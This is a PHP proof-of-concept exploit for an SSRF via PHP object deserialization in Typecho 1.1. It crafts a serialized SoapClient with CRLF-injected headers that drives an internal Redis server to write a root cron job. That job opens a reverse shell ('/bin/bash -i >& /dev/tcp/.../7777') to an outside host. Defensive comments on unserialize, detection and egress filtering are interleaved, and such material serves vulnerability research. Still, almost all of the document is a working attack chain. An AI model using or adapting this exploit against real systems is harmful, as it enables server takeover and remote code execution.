Typecho(1.1) SSRF:
Requires PHP's SoapClient class, and the application unserializing it.
POC:
<?php
/**
 * Stand-in declared only so that serialize() emits an object carrying the class
 * name Typecho_Db_Query and these private property names.
 *
 * NOTE(review): presumably mirrors the property layout of the real Typecho 1.1
 * class so the target accepts the object on unserialize() -- confirm against the
 * Typecho source. Property names and declaration order determine the serialized
 * bytes, so they must not be renamed or reordered.
 *
 * Defensive reading: an application that calls unserialize() on request data lets
 * the sender choose which classes get instantiated. Decode such input as JSON, or
 * pass ['allowed_classes' => false] to unserialize().
 */
class Typecho_Db_Query{
// Default query state copied into every new instance.
private static $_default = array(
'action' => 'SELECT',
);
// Holds whatever object the caller supplies; in this PoC it is a SoapClient.
private $_adapter;
private $_sqlPreBuild;
private $_prefix;
/**
 * @param mixed $adapter object stored as the query's adapter
 * @param mixed $prefix  value stored as the table prefix
 */
public function __construct($adapter, $prefix){
$this->_adapter = &$adapter;
$this->_prefix = $prefix;
$this->_sqlPreBuild = self::$_default;
}
}
// Proof-of-concept payload builder for the SSRF described above. It only prints a
// base64 string; nothing is sent from this script.
//
// Defensive takeaways:
//  - the root cause is unserialize() on attacker-controlled input; remove it or
//    pass ['allowed_classes' => false];
//  - after base64-decoding, request input containing a serialized SoapClient
//    object (O:10:"SoapClient") is a strong indicator of this technique;
//  - restrict outbound connections from the web tier to internal services, and
//    require authentication on Redis rather than relying on network position.

// Internal address the server would be made to contact (redacted by the author).
// 6379 is the default Redis port.
$target = "http://XXX.XXX.182.9:6379";
// Request body: Redis commands (SET, CONFIG SET dir/dbfilename, SAVE) that would
// persist a cron entry on the Redis host. '^^' is a placeholder that is swapped
// for line-break bytes further down.
$post_string = 'set xx "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/XXX.XXX.180.248/7777 0>&1\n\n" ^^ config set dir /var/spool/cron/ ^^ config set dbfilename root ^^ save';
// No extra headers are added in this PoC.
$headers = array(
);
// Non-WSDL SoapClient whose 'location' is the internal target. The 'user_agent'
// option is abused as a carrier: it holds additional header lines and the body,
// separated by the '^^' placeholder.
$a = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '. (string)strlen($post_string).'^^^^'.$post_string,'uri'=>'hello'));
$b = serialize($a);
// Replace the two-byte placeholder with two line-break bytes; the replacement has
// the same length, so the length prefixes in the serialized string stay valid.
$b = str_replace('^^',"\n\r",$b);
// Rebuild the SoapClient object from the modified serialized form.
$c = unserialize($b);
// Wrap it as the query object's adapter.
// NOTE(review): presumably the application later calls a method on the adapter,
// which makes SoapClient issue an HTTP request to 'location' -- the page does not
// show that code path.
$query = new Typecho_Db_Query($c,'B');
$exp = array(
'adapter' => $query,
'prefix' => 'typecho_'
);
// Print the serialized structure, base64-encoded. How the application receives it
// is not shown on this page.
echo base64_encode(serialize($exp));
?>